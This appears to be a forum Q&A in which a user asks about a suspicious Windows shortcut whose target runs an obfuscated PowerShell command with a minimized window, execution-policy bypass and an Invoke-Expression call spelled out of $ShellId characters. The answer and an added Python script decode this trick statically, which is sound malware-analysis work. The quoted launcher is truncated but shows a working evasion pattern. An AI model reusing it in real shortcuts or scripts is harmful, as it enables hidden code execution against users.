Malware Using .Lnk file to Powershell
Question
I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?
Recommended answer
My guess, it runs a Powershell with
- NoProfile
- WindowStyle 1 = minimized
- ExecutionPolicy ByPass = not blocked and no warning or prompt
- then dot-sources the rest of the code
Let's split this code:
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
$ShellId is a built-in Powershell variable:
>$ShellId
Microsoft.PowerShell
So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression)
The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I guess the char array contains ASCII characters. If so, we can transform it to:
$aspx =
Summary:
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
So it invokes the code starting with $aspx = in a minimized Powershell window without warnings or prompts.
Perhaps the code is run through one of these obfuscation methods.
Hope that helps.
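As an added example (not code from the original question or answer), the following Python script decodes the visible part of this command line statically, the same way the answer reasons through it: it expands the abbreviated powershell.exe switches, resolves the $ShellId index trick to the cmdlet alias it spells, and turns the [char[]] code-point list into text, all without ever handing anything to Invoke-Expression. The sample command line is constructed from the portion quoted in the question; the omitted tail is not reconstructed, and the switch list and the $ShellId value "Microsoft.PowerShell" are taken from the answer above.

```python
import re

# Value of $ShellId in Windows PowerShell, as shown in the answer above.
SHELL_ID = "Microsoft.PowerShell"

# powershell.exe accepts any unambiguous prefix of a switch name, which is why
# "-NoPr -WINd -eXEc" parse at all. Canonical names (assumed list, not exhaustive).
SWITCHES = ["-NoProfile", "-WindowStyle", "-ExecutionPolicy", "-NoExit",
            "-NonInteractive", "-EncodedCommand", "-Command", "-File"]

# Constructed sample: the visible part of the shortcut target from the question,
# with the elided remainder replaced by closing parentheses so it is well formed.
SAMPLE = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
          "-NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') "
          "([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61)))")


def expand_switch(token: str) -> str:
    """Map an abbreviated, case-insensitive switch prefix to its canonical name.

    Ambiguous prefixes are returned unchanged, mirroring PowerShell's behaviour
    of refusing them rather than guessing.
    """
    matches = [s for s in SWITCHES if s.lower().startswith(token.lower())]
    return matches[0] if len(matches) == 1 else token


def resolve_shellid_expr(expr: str) -> str:
    """Statically evaluate an expression built from $ShellId[n] indexes and
    single-quoted literals, e.g. "$shelliD[1]+$SHeLlID[13]+'x'" -> "iex"."""
    pieces = []
    for m in re.finditer(r"\$shellid\[(\d+)\]|'([^']*)'", expr, re.IGNORECASE):
        if m.group(1) is not None:
            pieces.append(SHELL_ID[int(m.group(1))])   # one character of $ShellId
        else:
            pieces.append(m.group(2))                   # literal string
    return "".join(pieces)


def decode_char_array(text: str) -> str:
    """Decode the first [char[]](n, n, ...) list in text into the string it builds."""
    m = re.search(r"\[char\[\]\]\s*\(([\d\s,]+)", text, re.IGNORECASE)
    if not m:
        raise ValueError("no [char[]] code-point list found")
    codes = [int(x) for x in re.findall(r"\d+", m.group(1))]
    return "".join(chr(c) for c in codes)


def analyze(cmdline: str) -> dict:
    """Summarise a powershell.exe command line of the shape seen in the question."""
    head, _, body = cmdline.partition(" . ")   # dot-source operator splits switches from payload
    switches = [expand_switch(t) for t in head.split() if t.startswith("-")]
    shellid_expr = re.search(r"\(\s*\$shellid\[[^)]*\)", body, re.IGNORECASE)
    invoked = resolve_shellid_expr(shellid_expr.group(0)) if shellid_expr else None
    return {
        "switches": switches,            # e.g. ['-NoProfile', '-WindowStyle', '-ExecutionPolicy']
        "invokes": invoked,              # the alias the $ShellId trick spells, e.g. 'iex'
        "decoded_prefix": decode_char_array(body),   # start of the hidden script text
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value!r}")
```

Running it on the sample prints the three canonical switches, the alias "iex", and the decoded prefix "$aspx =", which is exactly the chain the answer reconstructs by hand. For a real artifact the same approach applies to the full code-point list: decode it to text first and read the result, rather than letting PowerShell evaluate it.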